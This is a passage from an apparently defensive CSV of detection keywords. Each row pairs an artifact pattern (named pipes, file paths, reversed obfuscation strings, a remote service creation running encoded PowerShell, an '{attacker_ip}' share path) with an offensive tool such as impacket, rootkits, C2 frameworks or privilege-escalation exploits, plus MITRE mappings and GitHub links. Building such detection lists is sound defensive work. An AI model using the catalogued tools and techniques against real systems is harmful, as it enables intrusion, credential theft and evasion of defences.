Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*\$*.kirbi*",".{0,1000}\\\$.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\(s)AINT\Cam*",".{0,1000}\\\(s\)AINT\\Cam.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\(s)AINT\Logs*",".{0,1000}\\\(s\)AINT\\Logs.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\(s)AINT\saint.jar*",".{0,1000}\\\(s\)AINT\\saint\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\(s)AINT\Screenshot*",".{0,1000}\\\(s\)AINT\\Screenshot.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*\*.O365.GroupMembership_AdminGroups.txt*",".{0,1000}\\.{0,1000}\.O365\.GroupMembership_AdminGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*\*.O365.GroupMembership_VPNGroups.txt*",".{0,1000}\\.{0,1000}\.O365\.GroupMembership_VPNGroups\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*\*.O365.Roles_Admins.txt*",".{0,1000}\\.{0,1000}\.O365\.Roles_Admins\.txt.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","N/A","N/A","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*\.clone.dll*",".{0,1000}\\\.clone\.dll.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*\.eKeys-Parsed.txt*",".{0,1000}\\\.eKeys\-Parsed\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\:MLKH*",".{0,1000}\\\:MLKH.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed HKLM:\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\\$ComputerName delete $ServiceName*",".{0,1000}\\\\\$ComputerName\sdelete\s\$ServiceName.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\\* create Service_* binpath= `""C:\Windows\System32\cmd.exe /c powershell.exe -enc *",".{0,1000}\\\\.{0,1000}\screate\sService_.{0,1000}\sbinpath\=\s\`\""C\:\\Windows\\System32\\cmd\.exe\s\/c\spowershell\.exe\s\-enc\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*\\.\\pipe\\blindspot-*",".{0,1000}\\\\\.\\\\pipe\\\\blindspot\-.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\\.\\pipe\\kangaroo*",".{0,1000}\\\\\.\\\\pipe\\\\kangaroo.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","pipename","10","6","577","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z" "*\\.\\pipe\\keylogger*",".{0,1000}\\\\\.\\\\pipe\\\\keylogger.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\\.\\pipe\\lsarelayx*",".{0,1000}\\\\\.\\\\pipe\\\\lsarelayx.{0,1000}","offensive_tool_keyword","lsarelayx","lsarelayx is system wide NTLM relay tool designed to relay incoming NTLM based authentication to the host it is running on","T1557.001 - T1187 - T1558","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/CCob/lsarelayx","1","0","N/A","10","6","511","62","2023-04-25T23:15:33Z","2021-11-12T18:55:01Z" "*\\.\\pipe\\netview*",".{0,1000}\\\\\.\\\\pipe\\\\netview.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\\.\\pipe\\portscan*",".{0,1000}\\\\\.\\\\pipe\\\\portscan.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*\\.\\pipe\\Teste*",".{0,1000}\\\\\.\\\\pipe\\\\Teste.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\\.\Nidhogg*",".{0,1000}\\\\\.\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\\.\pipe\coerced\pipe\spoolss*",".{0,1000}\\\\\.\\pipe\\coerced\\pipe\\spoolss.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","10","2","172","27","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z" "*\\.\pipe\Merlin*",".{0,1000}\\\\\.\\pipe\\Merlin.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\\.\pipe\merlin*",".{0,1000}\\\\\.\\pipe\\merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","named pipe","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\\.\pipe\mimi*",".{0,1000}\\\\\.\\pipe\\mimi.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "*\\.\pipe\pwned/pipe/srvsvc*",".{0,1000}\\\\\.\\pipe\\pwned\/pipe\/srvsvc.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","pipename","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*\\.\pipe\test\pipe\spoolss *",".{0,1000}\\\\\.\\pipe\\test\\pipe\\spoolss\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\\.\pipe\win-sux-no-async-anon-pipe-*-*",".{0,1000}\\\\\.\\pipe\\win\-sux\-no\-async\-anon\-pipe\-.{0,1000}\-.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","N/A","10","10","164","51","2023-04-18T16:14:42Z","2017-11-23T11:19:53Z" "*\\:C*",".{0,1000}\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed c:\\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\\??\\Jormungandr*",".{0,1000}\\\\\?\?\\\\Jormungandr.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","0","N/A","N/A","3","210","26","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*\\??\\Nidhogg*",".{0,1000}\\\\\?\?\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\\\\*\\*\\Get-FileLockProcess.ps1*",".{0,1000}\\\\\\\\.{0,1000}\\\\.{0,1000}\\\\Get\-FileLockProcess\.ps1.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "*\\\\*\\share\\test.bin*",".{0,1000}\\\\\\\\.{0,1000}\\\\share\\\\test\.bin.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\\\\.\\*\\*\\*\\smile.txt\*",".{0,1000}\\\\\\\\\.\\\\.{0,1000}\\\\.{0,1000}\\\\.{0,1000}\\\\smile\.txt\\.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*\\\\.\\aswSP_Avar*",".{0,1000}\\\\\\\\\.\\\\aswSP_Avar.{0,1000}","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","0","N/A","10","3","245","46","2023-06-14T02:13:19Z","2023-01-15T22:37:34Z" "*\\\\.\\Cronos*",".{0,1000}\\\\\\\\\.\\\\Cronos.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","8","797","177","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z" "*\\\\.\\pipe\\coerced\\pipe\\spoolss*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\coerced\\\\pipe\\\\spoolss.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*\\\\.\\pipe\\coerced\\pipe\\srvsvc*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\coerced\\\\pipe\\\\srvsvc.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","N/A","10","3","259","63","2023-11-03T20:58:26Z","2023-09-11T19:04:29Z" "*\\\\.\\pipe\\innocent*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\innocent.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*\\\\.\\pipe\\ioring_in*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\ioring_in.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*\\\\.\\pipe\\ioring_out*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\ioring_out.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*\\\\.\\pipe\\mal*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\mal.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*\\\\.\\pipe\\merlin*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\merlin.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","named pipe","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\\\\.\\pipe\\warpzone8*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\warpzone8.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*\\\\{attacker_ip}\\*",".{0,1000}\\\\\\\\\{attacker_ip\}\\\\.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*\\\\{coerce_to}\\*",".{0,1000}\\\\\\\\\{coerce_to\}\\\\.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*\\\\127.0.0.1\\pipe\\warpzone8*",".{0,1000}\\\\\\\\127\.0\.0\.1\\\\pipe\\\\warpzone8.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","0","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*\\127.0.0.1\c$*",".{0,1000}\\\\127\.0\.0\.1\\c\$.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\\ataDmargorP\\:C*",".{0,1000}\\\\ataDmargorP\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed strings","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*\\c$\Windows\Temp\*.dmp*",".{0,1000}\\\\c\$\\Windows\\Temp\\.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*\\DCSC_stdInPipe*",".{0,1000}\\\\DCSC_stdInPipe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*\\DCSC_stdOutPipe*",".{0,1000}\\\\DCSC_stdOutPipe.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","0","N/A","8","2","110","14","2023-11-09T10:36:23Z","2023-08-25T15:18:30Z" "*\\Device\\Nidhogg*",".{0,1000}\\\\Device\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\\Device\\Nidhogg*",".{0,1000}\\\\Device\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Idov31/Nidhogg","1","0","N/A","10","10","1603","252","2024-04-13T16:41:39Z","2022-05-29T14:37:50Z" "*\\Device\\StealToken*",".{0,1000}\\\\Device\\\\StealToken.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*\\Driver\\Nidhogg*",".{0,1000}\\\\Driver\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - 